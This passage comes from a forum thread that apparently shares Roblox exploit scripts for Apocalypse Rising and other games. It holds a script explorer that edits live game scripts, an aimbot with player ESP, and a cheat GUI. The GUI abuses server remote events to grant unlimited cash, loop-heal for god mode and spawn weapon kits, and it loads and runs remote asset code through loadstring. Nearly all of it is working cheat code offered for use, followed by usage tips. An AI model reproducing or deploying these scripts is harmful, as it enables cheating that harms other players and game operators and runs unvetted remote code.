  1584. for Num, Prop in pairs(BrickColorProperties) do
  1585. if TestProperty(Object, Prop) then
  1586. AddBrickColorOption(Object, Prop)
  1587. end
  1588. end
  1589. end
  1590.  
  1591. function Search(Object)
  1592. Gui = Instance.new("ScreenGui")
  1593. Gui.Parent = game.CoreGui
  1594. Gui.Name = "Explorer"
  1595. if Object ~= game then
  1596. AddOption("Back", function()
  1597. Clear();
  1598. Search(Object.Parent)
  1599. end, Color3.new(0.5, 1, 1), false)
  1600. end
  1601. AddOption("Reload", function() Clear(); Search(Object); end, Color3.new(0.2, 1, 0.2), false)
  1602. if Cloned then
  1603. AddOption("Paste", function() Cloned:Clone().Parent = Object; Clear(); Search(Object); end, Color3.new(0.5, 1, 1), false)
  1604. end
  1605. if Deleted then
  1606. AddOption("Undo", function() Deleted.Parent = DeleteParent; Deleted = nil; DeletedParent = nil; Clear(); Search(Object); end, Color3.new(1, 0.6, 0.1), false)
  1607. end
  1608. if Object:IsA("Player") then
  1609. AddOption("Goto Character", function() Clear(); if Object.Character then Search(Object.Character); end end, Color3.new(1, 1, 1), false)
  1610. end
  1611. if Object:IsA("LocalScript") then
  1612. AddOption("EditScript", function() Clear(); ScriptSearch(Object); end, Color3.new(1, 1, 1), false)
  1613. end
  1614. if Object:IsA("Terrain") then
  1615. AddOption("Clear", function() Object:Clear(); end, Color3.new(1, 1, 1), false)
  1616. end
  1617. LoadOptions(Object)
  1618. AddOption("Close", Clear, Color3.new(1, 0.2, 0), false)
  1619. if not Object:IsA("Workspace") or not Object:IsA("Player") then
  1620. for Num, Obj in pairs(Object:GetChildren()) do
  1621. --if not Obj:IsA("BasePart") or not Object.Parent == game.Workspace then
  1622. if true then
  1623. if Obj:IsA("LocalScript") then
  1624. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(1, 0, 0), true)
  1625. elseif Obj:IsA("Script") or Obj:IsA("StarterScript") or Obj:IsA("CoreScript") then
  1626. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(0.5, 0.5, 0.8), true)
  1627. elseif Obj.Parent == game then
  1628. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(1, 1, 1), false)
  1629. else
  1630. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(1, 1, 1), true)
  1631. end
  1632. end
  1633. end
  1634. end
  1635. function MoveUp(Place, Amount)
  1636. for i,v in pairs(Place:GetChildren()) do
  1637. if v:IsA("TextLabel") or v:IsA("TextBox") then
  1638. v.Position = v.Position + UDim2.new(0,0,0,-Amount)
  1639. end
  1640. end
  1641. end
  1642. function MoveDown(Place, Amount)
  1643. for i,v in pairs(Place:GetChildren()) do
  1644. if v:IsA("TextLabel") or v:IsA("TextBox") then
  1645. v.Position = v.Position + UDim2.new(0,0,0,Amount)
  1646. end
  1647. end
  1648. end
  1649. i=0
  1650. function ScriptSearch(S)
  1651. Script2 = S
  1652. Script = Script2.Source
  1653. Table = {}
  1654. Enabled = true
  1655. Gui = Instance.new("ScreenGui")
  1656. Gui.Parent = game.CoreGui
  1657. Gui.Name = "Explorer"
  1658. while Enabled do
  1659. Start, End = string.find(Script, '\n')
  1660. print(Start, End)
  1661. if Start and End then
  1662. table.insert(Table, string.sub(Script, 1, End))
  1663. New = string.sub(Script, End+1, string.len(Script))
  1664. Script = New
  1665. else
  1666. Enabled = false
  1667. table.insert(Table, string.sub(Script, 1, End))
  1668. print("Finished")
  1669. end
  1670. end
  1671. P = Instance.new("TextLabel")
  1672. P.Size = UDim2.new(0, 500, 0, 20)
  1673. P.Text = Script2.Name
  1674. P.Name = "Script Line"
  1675. P.Parent = Gui
  1676. P.BackgroundColor3 = Color3.new(1, 1, 1)
  1677. P.TextColor3 = Color3.new(0, 0, 0)
  1678. P.BackgroundTransparency = 0.5
  1679. P.Position = UDim2.new(0.5, -250, 0, 150+(20*(i-1)))
  1680. P.TextXAlignment = "Left"
  1681. i=i+1
  1682. New = {}
  1683. for I,Val in pairs(Table) do
  1684. print(Val)
  1685. P = Instance.new("TextBox")
  1686. P.ClearTextOnFocus = false
  1687. P.Size = UDim2.new(0, 500, 0, 20)
  1688. P.Text = Val
  1689. P.Name = "Script Line"
  1690. P.Parent = Gui
  1691. P.BackgroundColor3 = Color3.new(1, 1, 1)
  1692. P.TextColor3 = Color3.new(0, 0, 0)
  1693. P.BackgroundTransparency = 0.5
  1694. P.Position = UDim2.new(0.5, -250, 0, 150+(20*(i-1)))
  1695. P.TextXAlignment = "Left"
  1696. table.insert(New, P)
  1697. i=i+1
  1698. end
  1699. i=1
  1700. P = Instance.new("TextButton")
  1701. P.Size = UDim2.new(0, 20, 0, 20)
  1702. P.Text = "^"
  1703. P.Name = "Scroll"
  1704. P.Parent = Gui
  1705. P.BackgroundColor3 = Color3.new(1, 1, 1)
  1706. P.TextColor3 = Color3.new(0, 0, 0)
  1707. P.BackgroundTransparency = 0.5
  1708. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  1709. P.MouseButton1Click:connect(function()
  1710. MoveUp(Gui, -20)
  1711. end)
  1712. i=i+1
  1713. P = Instance.new("TextButton")
  1714. P.Size = UDim2.new(0, 20, 0, 20)
  1715. P.Text = "v"
  1716. P.Name = "Scroll"
  1717. P.Parent = Gui
  1718. P.BackgroundColor3 = Color3.new(1, 1, 1)
  1719. P.TextColor3 = Color3.new(0, 0, 0)
  1720. P.BackgroundTransparency = 0.5
  1721. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  1722. P.MouseButton1Click:connect(function()
  1723. MoveDown(Gui, -20)
  1724. end)
  1725. i=i+1
  1726. P = Instance.new("TextButton")
  1727. P.Size = UDim2.new(0, 20, 0, 20)
  1728. P.Text = "^^"
  1729. P.Name = "Scroll"
  1730. P.Parent = Gui
  1731. P.BackgroundColor3 = Color3.new(1, 1, 1)
  1732. P.TextColor3 = Color3.new(0, 0, 0)
  1733. P.BackgroundTransparency = 0.5
  1734. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  1735. P.MouseButton1Click:connect(function()
  1736. MoveUp(Gui, -200)
  1737. end)
  1738. i=i+1
  1739. P = Instance.new("TextButton")
  1740. P.Size = UDim2.new(0, 20, 0, 20)
  1741. P.Text = "vv"
  1742. P.Name = "Scroll"
  1743. P.Parent = Gui
  1744. P.BackgroundColor3 = Color3.new(1, 1, 1)
  1745. P.TextColor3 = Color3.new(0, 0, 0)
  1746. P.BackgroundTransparency = 0.5
  1747. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  1748. P.MouseButton1Click:connect(function()
  1749. MoveDown(Gui, -200)
  1750. end)
  1751. i=i+1
  1752. P = Instance.new("TextButton")
  1753. P.Size = UDim2.new(0, 20, 0, 20)
  1754. P.Text = "S"
  1755. P.Name = "Save"
  1756. P.Parent = Gui
  1757. P.BackgroundColor3 = Color3.new(0, 1, 0)
  1758. P.TextColor3 = Color3.new(0, 0, 0)
  1759. P.BackgroundTransparency = 0.5
  1760. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  1761. P.MouseButton1Click:connect(function()
  1762. StringS = ""
  1763. for Num, Obj in pairs(New) do
  1764. StringS = StringS..Obj.Text..'\n'
  1765. end
  1766. S.Source = StringS
  1767. S.Disabled = true
  1768. S.Disabled = false
  1769. end)
  1770. i=i+1
  1771. P = Instance.new("TextButton")
  1772. P.Size = UDim2.new(0, 20, 0, 20)
  1773. P.Text = "x"
  1774. P.Name = "Back"
  1775. P.Parent = Gui
  1776. P.BackgroundColor3 = Color3.new(1, 0.2, 0)
  1777. P.TextColor3 = Color3.new(0, 0, 0)
  1778. P.BackgroundTransparency = 0.5
  1779. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  1780. P.MouseButton1Click:connect(function()
  1781. Clear()
  1782. i=0
  1783. Search(S)
  1784. end)
  1785. i=i+1
  1786. end
  1787. end
  1788.  
  1789. pgr.MouseButton1Click:connect(function()
  1790. Clear()
  1791. Search(game)
  1792. end)
  1793. end
  1794.  
  1795. hills()
  1796. aimbot()
  1797. secondgod()
  1798. spawner()
  1799. justice()
  1800. explorer()
  1801.  
  1802.  
  1803.  
  1804. print("All Set")
  1805.  
  1806. Use the aimbot with left alt
  1807.  
  1808. You can read the hills commands in the actual script, key is ;
  1809.  
  1810. Once you god yourself with the hills gui, use the transparent gui on the left and enable god for a faster loopheal
  1811.  
  1812. I use the justice gui (gray gui on the left side) to spawn car repair kits (local)
  1813.  
  1814. I use the explorer to change the cars max armor and speed in game.Workspace.Vehicles
  1815.  
  1816. RE: Apocalypse Rising Scripts Request. - Jack - 07-05-2016
  1817.  
  1818. What are the commands?
  1819. (07-05-2016, 06:55 PM)PancakeSloth Wrote:
  1820. Code:
  1821. function aimbot()
  1822. --Aimbot
  1823. print("Key to toggle esp is V.")
  1824. print("Aim-key is Left-Alt.")
  1825.  
  1826. ENABLED = false
  1827. PLAYER = game.Players.LocalPlayer
  1828. MOUSE = PLAYER:GetMouse()
  1829. CC = game.Workspace.CurrentCamera
  1830. _G.FREE_FOR_ALL = true
  1831. _G.BIND = 52
  1832. _G.AIM_AT = 'Head'
  1833. local player = game.Players.LocalPlayer
  1834. local esp = false
  1835. local track = false
  1836.  
  1837.  
  1838.  
  1839. function Create(base, team)
  1840. local bb = Instance.new("BillboardGui",player.PlayerGui)
  1841. bb.Adornee = base
  1842. bb.ExtentsOffset = Vector3.new(0,1,0)
  1843. bb.AlwaysOnTop = true
  1844. bb.Size = UDim2.new(0,5,0,5)
  1845. bb.StudsOffset = Vector3.new(0,1,0)
  1846. bb.Name = "tracker"
  1847. local frame = Instance.new("Frame",bb)
  1848. frame.ZIndex = 10
  1849. frame.BackgroundTransparency = 0.3
  1850. frame.Size = UDim2.new(1,0,1,0)
  1851. frame.Position = UDim2.new(0,0,0)
  1852. frame.Transparency = 1
  1853. local txtlbl = Instance.new("TextLabel",bb)
  1854. txtlbl.ZIndex = 10
  1855. txtlbl.Text = (string.upper(base.Parent.Name))
  1856. txtlbl.BackgroundTransparency = 1
  1857. txtlbl.Position = UDim2.new(0,0,0,-35)
  1858. txtlbl.Size = UDim2.new(1,0,10,0)
  1859. txtlbl.Font = "SourceSansBold"
  1860. txtlbl.FontSize = "Size10"
  1861. txtlbl.TextStrokeTransparency = 0.5
  1862.  
  1863. local txtlbl2 = Instance.new("TextLabel",bb)
  1864. txtlbl2.ZIndex = 10
  1865. txtlbl2.Text = (math.floor(base.Parent.Humanoid.Health*100)/100)
  1866. txtlbl2.BackgroundTransparency = 1
  1867. txtlbl2.Position = UDim2.new(0,0,0,-25)
  1868. txtlbl2.Size = UDim2.new(1,0,10,0)
  1869. txtlbl2.Font = "SourceSansBold"
  1870. txtlbl2.FontSize = "Size10"
  1871.  
  1872. txtlbl2.TextStrokeTransparency = 0.5
  1873. if team then
  1874. txtlbl.TextColor3 = Color3.new(255,0,0)
  1875. txtlbl2.TextColor3 = Color3.new(255,0,0)
  1876. frame.BackgroundColor3 = Color3.new(255,0,0)
  1877.  
  1878. elseif base.Parent.Name == "friend" or base.Parent.Name == "friend2" then
  1879. txtlbl.TextColor3 = Color3.new(0,255,0)
  1880. txtlbl2.TextColor3 = Color3.new(0,255,0)
  1881. frame.BackgroundColor3 = Color3.new(0,255,0)
  1882. txtlbl.Text = "FRIEND"
  1883. txtlbl.FontSize = "Size14"
  1884. txtlbl2.FontSize = "Size14"
  1885.  
  1886.  
  1887.  
  1888. elseif base.Parent.Name == game.Players.LocalPlayer.Name then
  1889. txtlbl2.Transparency = 1
  1890. txtlbl.Transparency = 1
  1891. frame.Transparency = 1
  1892. else
  1893. txtlbl.TextColor3 = Color3.new(255,0,0)
  1894. txtlbl2.TextColor3 = Color3.new(255,0,0)
  1895. frame.BackgroundColor3 = Color3.new(255,0,0)
  1896.  
  1897. end
  1898. end
  1899.  
  1900.  
  1901. function Find()
  1902. Clear()
  1903. track = true
  1904. spawn(function()
  1905. while wait() do
  1906. if track then
  1907. Clear()
  1908. for _,v in pairs(game.Players:players()) do
  1909.  
  1910. if v.Character and v.Character.Head then
  1911. Create(v.Character.Head, false)
  1912. end
  1913. end
  1914. end
  1915. end
  1916. wait(1)
  1917. end)
  1918. end
  1919. function Clear()
  1920. for _,v in pairs(player.PlayerGui:children()) do
  1921. if v.Name == "tracker" and v:isA("BillboardGui") then
  1922. v:Destroy()
  1923. end
  1924. end
  1925. end
  1926. mouse=game.Players.LocalPlayer:GetMouse()
  1927. mouse.keyDown:connect(function(key)
  1928. if key == "v" then
  1929. if not esp then
  1930. Find()
  1931. print("ESP ENABLED")
  1932. esp = true
  1933. else
  1934. Clear()
  1935. track = false
  1936. print("ESP DISABLED")
  1937. esp = false
  1938. end
  1939.  
  1940.  
  1941.  
  1942.  
  1943. end
  1944.  
  1945. end)
  1946.  
  1947.  
  1948.  
  1949.  
  1950. --aimbot
  1951.  
  1952.  
  1953. function GetNearestPlayerToMouse()
  1954. local PLAYERS = {}
  1955. local PLAYER_HOLD = {}
  1956. local DISTANCES = {}
  1957. for i, v in pairs(game.Players:GetPlayers()) do
  1958. if v ~= PLAYER then
  1959. table.insert(PLAYERS, v)
  1960. end
  1961. end
  1962. for i, v in pairs(PLAYERS) do
  1963. if _G.FREE_FOR_ALL == false then
  1964. if v and (v.Character) ~= nil and v.TeamColor ~= PLAYER.TeamColor then
  1965. local AIM = v.Character:FindFirstChild(_G.AIM_AT)
  1966. if AIM ~= nil then
  1967. local DISTANCE = (AIM.Position - game.Workspace.CurrentCamera.CoordinateFrame.p).magnitude
  1968. local RAY = Ray.new(game.Workspace.CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE)
  1969. local HIT,POS = game.Workspace:FindPartOnRay(RAY, game.Workspace)
  1970. local DIFF = math.floor((POS - AIM.Position).magnitude)
  1971. PLAYER_HOLD[v.Name .. i] = {}
  1972. PLAYER_HOLD[v.Name .. i].dist = DISTANCE
  1973. PLAYER_HOLD[v.Name .. i].plr = v
  1974. PLAYER_HOLD[v.Name .. i].diff = DIFF
  1975. table.insert(DISTANCES, DIFF)
  1976. end
  1977. end
  1978. elseif _G.FREE_FOR_ALL == true then
  1979. local AIM = v.Character:FindFirstChild(_G.AIM_AT)
  1980. if AIM ~= nil then
  1981. local DISTANCE = (AIM.Position - game.Workspace.CurrentCamera.CoordinateFrame.p).magnitude
  1982. local RAY = Ray.new(game.Workspace.CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE)
  1983. local HIT,POS = game.Workspace:FindPartOnRay(RAY, game.Workspace)
  1984. local DIFF = math.floor((POS - AIM.Position).magnitude)
  1985. PLAYER_HOLD[v.Name .. i] = {}
  1986. PLAYER_HOLD[v.Name .. i].dist = DISTANCE
  1987. PLAYER_HOLD[v.Name .. i].plr = v
  1988. PLAYER_HOLD[v.Name .. i].diff = DIFF
  1989. table.insert(DISTANCES, DIFF)
  1990. end
  1991. end
  1992. end
  1993.  
  1994. if unpack(DISTANCES) == nil then
  1995. return false
  1996. end
  1997.  
  1998. local L_DISTANCE = math.floor(math.min(unpack(DISTANCES)))
  1999. if L_DISTANCE > 20 then
  2000. return false
  2001. end
  2002.  
  2003. for i, v in pairs(PLAYER_HOLD) do
  2004. if v.diff == L_DISTANCE then
  2005. return v.plr
  2006. end
  2007. end
  2008. return false
  2009. end
  2010.  
  2011. local TRACK = false
  2012.  
  2013.  
  2014. MOUSE.KeyDown:connect(function(KEY)
  2015. KEY = KEY:lower():byte()
  2016. if KEY == _G.BIND then
  2017. ENABLED = true
  2018. end
  2019. end)
  2020. MOUSE.KeyUp:connect(function(KEY)
  2021. KEY = KEY:lower():byte()
  2022. if KEY == _G.BIND then
  2023. ENABLED = false
  2024. end
  2025. end)
  2026.  
  2027. game:GetService('RunService').RenderStepped:connect(function()
  2028. if ENABLED then
  2029. local TARGET = GetNearestPlayerToMouse()
  2030. if TARGET.Name == "Whitelist kid here" or TARGET.Name == "second whitelist kid here" then
  2031. else
  2032.  
  2033. if (TARGET ~= false) then
  2034. local AIM = TARGET.Character:FindFirstChild(_G.AIM_AT)
  2035. if AIM then
  2036. CC.CoordinateFrame = CFrame.new(CC.CoordinateFrame.p, AIM.CFrame.p)
  2037. end
  2038. end
  2039. end
  2040. end
  2041. end)
  2042. end
  2043. --Loadstrings
  2044. function justice()
  2045. --[[
  2046. Justice v.2.1
  2047. Created by RustehBusteh (Donald J Trump), thank's for using! :)
  2048. --]]
  2049.  
  2050. --[[ VALUES ]]--
  2051. VERSION = "2.1"
  2052. --[[ SUPPORTED GAMES ]]--
  2053. LasVegas = 163865146
  2054. PhantomForces = 292439477
  2055. ApocRisingReimagined = 237590657
  2056. ApocRisingReborn = 237590761
  2057. --EpicMiniGames = ""
  2058. --[[ GAME DETECTOR ]] --
  2059. if game.PlaceId == LasVegas then
  2060. game_Supported = "YES"
  2061. elseif game.PlaceId == PhantomForces then
  2062. game_Supported = "YES"
  2063. elseif game.PlaceId == ApocRisingReimagined then
  2064. game_Supported = "YES"
  2065. elseif game.PlaceId == ApocRisingReborn then
  2066. game_Supported = "YES"
  2067. --elseif game.PlaceId == EpicMiniGames then
  2068. --game_Supported = "YES"
  2069. else
  2070. game_Supported = "NO"
  2071. end
  2072. Asset123 = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
  2073. Game_name = Asset123.Name
  2074. --[[ GUI CREATING ]]--
  2075. game:GetObjects("rbxassetid://378228753")[1].Parent = game.CoreGui
  2076. wait(1)
  2077. --
  2078. MainGui = game.CoreGui.JusticeGui.MainGui
  2079. GameGui = game.CoreGui.JusticeGui.GameGui
  2080. CustomGui = game.CoreGui.JusticeGui.CustomGui
  2081. ApocGui = game.CoreGui.JusticeGui.ApocGui
  2082. OpenGui = game.CoreGui.JusticeGui.Open
  2083. -- NotSupportedGui = game.CoreGui.JusticeGui.NotSupported
  2084. --[[ INVISIBLE AND VISIBLE GUI FUNCTIONS ]] --
  2085. function make_gui_visible(Gui)
  2086. Gui.Position = UDim2.new(.5,-200,.5,-100)
  2087. Gui.Visible = true
  2088. end
  2089. function make_gui_invisible(Gui)
  2090. Gui.Position = UDim2.new(999,999,999,999)
  2091. Gui.Visible = false
  2092. end
  2093. make_gui_invisible(MainGui)
  2094. make_gui_invisible(GameGui)
  2095. make_gui_invisible(CustomGui)
  2096. make_gui_invisible(ApocGui)
  2097. OpenGui.Visible = false
  2098. -- make_gui_invisible(NotSupportedGui)
  2099. --[[ GUI EDITING ]]--
  2100. -- WELCOME GUI
  2101. MainGui.Welcome.Text = ("Welcome, " ..game.Players.LocalPlayer.Name.. "!")
  2102. MainGui.Title.Text = ("Justice v." ..VERSION)
  2103. MainGui.Game.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  2104. MainGui.GameSupported.Text = ("Game Supported: " ..game_Supported)
  2105. -- LOADING GUI
  2106. GameGui.Game.Text = ("Welcome, " ..game.Players.LocalPlayer.Name.. "!")
  2107. GameGui.Log1.Text = ""
  2108. GameGui.Log2.Text = ""
  2109. GameGui.Log3.Text = ""
  2110. GameGui.Log4.Text = ""
  2111. -- CUSTOM GUI
  2112. CustomGui.Page1.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  2113. CustomGui.Page2.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  2114. CustomGui.Page1.Button1.Text = ""
  2115. CustomGui.Page1.Button2.Text = ""
  2116. CustomGui.Page1.Button3.Text = ""
  2117. CustomGui.Page1.Button4.Text = ""
  2118. CustomGui.Page1.Button5.Text = ""
  2119. CustomGui.Page1.Button6.Text = ""
  2120. CustomGui.Page1.Button7.Text = ""
  2121. CustomGui.Page1.Button8.Text = ""
  2122.  
  2123. CustomGui.Page2.Button1.Text = ""
  2124. CustomGui.Page2.Button2.Text = ""
  2125. CustomGui.Page2.Button3.Text = ""
  2126. CustomGui.Page2.Button4.Text = ""
  2127. CustomGui.Page2.Button5.Text = ""
  2128. CustomGui.Page2.Button6.Text = ""
  2129. CustomGui.Page2.Button7.Text = ""
  2130. CustomGui.Page2.Button8.Text = ""
  2131. -- APOC GUI
  2132. ApocGui.Page1.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  2133. ApocGui.Page2.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  2134. ApocGui.Page1.Button1.Text = ""
  2135. ApocGui.Page1.Button2.Text = ""
  2136. ApocGui.Page1.Button3.Text = ""
  2137. ApocGui.Page1.Button4.Text = ""
  2138. ApocGui.Page1.Button5.Text = ""
  2139. ApocGui.Page1.Button6.Text = ""
  2140. ApocGui.Page1.Button7.Text = ""
  2141. ApocGui.Page1.Button8.Text = ""
  2142. ApocGui.Page1.Custom.Text = "LOCALPLAYER"
  2143.  
  2144. ApocGui.Page2.Button1.Text = ""
  2145. ApocGui.Page2.Button2.Text = ""
  2146. ApocGui.Page2.Button3.Text = ""
  2147. ApocGui.Page2.Button4.Text = ""
  2148. ApocGui.Page2.Button5.Text = ""
  2149. ApocGui.Page2.Button6.Text = ""
  2150. ApocGui.Page2.Custom.Text = "SERVER"
  2151.  
  2152. -- [[ OPEN GUI FUNCTIONS ]]--
  2153. OpenGui.MouseButton1Down:connect(function()
  2154. OpenGui.Visible = false
  2155. wait(.2)
  2156. if game.PlaceId == ApocRisingReimagined or game.PlaceId == ApocRisingReborn then
  2157. make_gui_visible(ApocGui)
  2158. else
  2159. make_gui_visible(CustomGui)
  2160. end
  2161. end)
  2162. -- [[ MAIN AND GAME FUNCTIONS ]] --
  2163. function functionMain_Gui()
  2164. make_gui_visible(MainGui)
  2165. MainGui.Open.MouseButton1Down:connect(function()
  2166. MainGui:Destroy()
  2167. functionGame_Gui()
  2168. end)
  2169. MainGui.Close.MouseButton1Down:connect(function()
  2170. game.CoreGui.JusticeGui:Destroy() -- rip
  2171. end)
  2172. end
  2173. function functionGame_Gui()
  2174. make_gui_visible(GameGui)
  2175. GameGui.Close.Visible = false
  2176. GameGui.Close.MouseButton1Down:connect(function()
  2177. if game_Supported == "YES" then
  2178. GameGui:Destroy()
  2179. if game.PlaceId == ApocRisingReimagined or game.PlaceId == ApocRisingReborn then
  2180. functionApocGui()
  2181. else
  2182. functionCustomGui()
  2183. end
  2184. else
  2185. -- make_gui_visible(NotSupported)
  2186. GameGui:Destroy()
  2187. end
  2188. end)
  2189. if game_Supported == "YES" then
  2190. wait(1)
  2191. GameGui.Log1.Text = "Game supported!"
  2192. wait(1)
  2193. GameGui.Log1.Text = "Loaded custom commands!"
  2194. GameGui.Log2.Text = "Game supported!"
  2195. wait(1)
  2196. GameGui.Close.Text = "CUSTOM COMMANDS"
  2197. else
  2198. wait(1)
  2199. GameGui.Log1.Text = "Game not supported!"
  2200. wait(1)
  2201. end
  2202. GameGui.Close.Visible = true
  2203. end
  2204. -- [[ CUSTOM GUI FUNCTIONS ]] --
  2205. function functionCustomGui()
  2206. make_gui_visible(CustomGui)
  2207. CustomGui.Page1.Close.MouseButton1Down:connect(function()
  2208. make_gui_invisible(CustomGui)
  2209. wait(.2)
  2210. OpenGui.Visible = true
  2211. end)
  2212. CustomGui.Page2.Close.MouseButton1Down:connect(function()
  2213. make_gui_invisible(CustomGui)
  2214. wait(.2)
  2215. OpenGui.Visible = true
  2216. end)
  2217. CustomGui.Page1.Page.Visible = false
  2218. CustomGui.Page2.Visible = false
  2219. if game.PlaceId == LasVegas then
  2220. CustomGui.Page1.Button1.Text = "Give 10 Million Cash"
  2221. CustomGui.Page1.Button2.Text = ""
  2222. CustomGui.Page1.Button3.Text = ""
  2223. CustomGui.Page1.Button4.Text = ""
  2224. CustomGui.Page1.Button5.Text = ""
  2225. CustomGui.Page1.Button6.Text = ""
  2226. CustomGui.Page1.Button7.Text = ""
  2227. CustomGui.Page1.Button8.Text = ""
  2228.  
  2229. CustomGui.Page1.Button1.MouseButton1Down:connect(function()
  2230. local CASH_AMOUNT = math.huge
  2231. game.ReplicatedStorage.Events.MoneyRequest:FireServer(CASH_AMOUNT, 'Cash', true)
  2232. end)
  2233. elseif game.PlaceId == PhantomForces then
  2234. CustomGui.Page1.Button1.Text = "Load PhantomX Gui"
  2235. CustomGui.Page1.Button1.MouseButton1Down:connect(function()
  2236. game:GetObjects('rbxassetid://311949717')[1].Parent = game.CoreGui
  2237. local PhantomX = game.CoreGui:WaitForChild('PhantomX')
  2238. local script = Instance.new('Script', game.CoreGui)
  2239. script.Name = ''
  2240. script.Source = PhantomX.CONTROL.Source
  2241. loadstring(script.Source)()
  2242. loadstring(game:GetObjects("rbxassetid://298918246")[1].Source)()
  2243. end)
  2244. --elseif game.PlaceId == EpicMiniGames then
  2245. end
  2246. end
  2247. -- [[ APOCALYPSE RISING ]] --
  2248. function LocalPlayerGod()
  2249. _G.lpgod = true
  2250. local ChangeProp = game.Lighting.Remote.ChangeProperty
  2251. local Plr = game.Players.LocalPlayer
  2252. while _G.lpgod == true and wait() do -- health hack
  2253. ChangeProp:FireServer(Plr.Character.Humanoid, "Health", 100)
  2254. end
  2255. end
  2256. function NoLocalPlayerGod()
  2257. _G.lpgod = false
  2258. end
  2259. function UnlimitedHunger()
  2260. _G.unlimhunger = true
  2261. while _G.unlimhunger == true and wait(2) do
  2262. game.Players.LocalPlayer.playerstats.Hunger.Value = 100
  2263. end
  2264. end
  2265. function UnlimitedThirst()
  2266. _G.unlimthirst = true
  2267. while _G.unlimthirst == true and wait(2) do
  2268. game.Players.LocalPlayer.playerstats.Thirst.Value = 100
  2269. end
  2270. end
  2271. -- [[ APOCALYPSE GUI FUNCTIONS ]] --
  2272. function functionApocGui()
  2273. make_gui_visible(ApocGui)
  2274. if game.PlaceId == ApocRisingReimagined or game.PlaceId == ApocRisingReborn then
  2275. ApocGui.Page1.Visible = true
  2276. ApocGui.Page2.Visible = false
  2277. -- CLOSE
  2278. ApocGui.Page1.Close.MouseButton1Down:connect(function()
  2279. make_gui_invisible(ApocGui)
  2280. wait(.2)
  2281. OpenGui.Visible = true
  2282. end)
  2283. ApocGui.Page2.Close.MouseButton1Down:connect(function()
  2284. make_gui_invisible(ApocGui)
  2285. wait(.2)
  2286. OpenGui.Visible = true
  2287. end)
  2288. -- NEXT/BACK
  2289. ApocGui.Page1.Page.Text = "NEXT"
  2290. ApocGui.Page1.Page.MouseButton1Down:connect(function()
  2291. ApocGui.Page1.Visible = false
  2292. ApocGui.Page2.Visible = true
  2293. end)
  2294. ApocGui.Page2.Page.Text = "BACK"
  2295. ApocGui.Page2.Page.MouseButton1Down:connect(function()
  2296. ApocGui.Page1.Visible = true
  2297. ApocGui.Page2.Visible = false
  2298. end)
  2299. ApocGui.Page1.Button1.Text = "SEMI-GOD"
  2300. ApocGui.Page1.Button2.Text = "UNSEMI-GOD"
  2301. ApocGui.Page1.Button3.Text = "UNLIMITED HUNGER"
  2302. ApocGui.Page1.Button4.Text = "UNLIMITED THIRST"
  2303. ApocGui.Page1.Button5.Text = "MK 17 KIT"
  2304. ApocGui.Page1.Button6.Text = "G36K KIT"
  2305. ApocGui.Page1.Button7.Text = "FAL KIT"
  2306. ApocGui.Page1.Button8.Text = "CAR REPAIR KIT"
  2307.  
  2308. ApocGui.Page2.Button1.Text = "SEMI-GOD"
  2309. ApocGui.Page2.Button2.Text = "N/A"
  2310. ApocGui.Page2.Button3.Text = "KILL"
  2311. ApocGui.Page2.Button4.Text = "N/A"
  2312. ApocGui.Page2.Button5.Text = "GOTO(WIP)"
  2313. ApocGui.Page2.Button6.Text = "BRING(WIP)"
  2314.  
  2315. ApocGui.Page1.Button1.MouseButton1Down:connect(function()
  2316. LocalPlayerGod()
  2317. print("lp godded")
  2318. end)
  2319. ApocGui.Page1.Button2.MouseButton1Down:connect(function()
  2320. NoLocalPlayerGod()
  2321. print("lp ungodded")
  2322. end)
  2323. ApocGui.Page1.Button3.MouseButton1Down:connect(function()
  2324. UnlimitedHunger()
  2325. print("unlimited hunger")
  2326. end)
  2327. ApocGui.Page1.Button4.MouseButton1Down:connect(function()
  2328. UnlimitedThirst()
  2329. print "unlimited thirst"
  2330. end)
  2331. ApocGui.Page1.Button5.MouseButton1Down:connect(function()
  2332. local function s(n)
  2333. local new = game.Lighting.LootDrops[n]:Clone()
  2334. new.Parent = workspace
  2335. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  2336. end
  2337. t ={"ACOG","Mk 17","Compass","CBJ-MS","TEC9Ammo32","TEC9Ammo32","Sabre","MilitaryPackBlack","Binoculars","Detonator","Suppressor9","Suppressor762","Grip","Reflex","GPS","Map","C4","C4","Entrencher","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50"}
  2338. for i = 1, #t do
  2339. s(t[i])
  2340. end
  2341. print "mk 17 kit"
  2342. end)
  2343. ApocGui.Page1.Button6.MouseButton1Down:connect(function()
  2344. local function AA(BB)
  2345. local new = game.Lighting.LootDrops[BB]:Clone()
  2346. new.Parent = workspace
  2347. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  2348. end
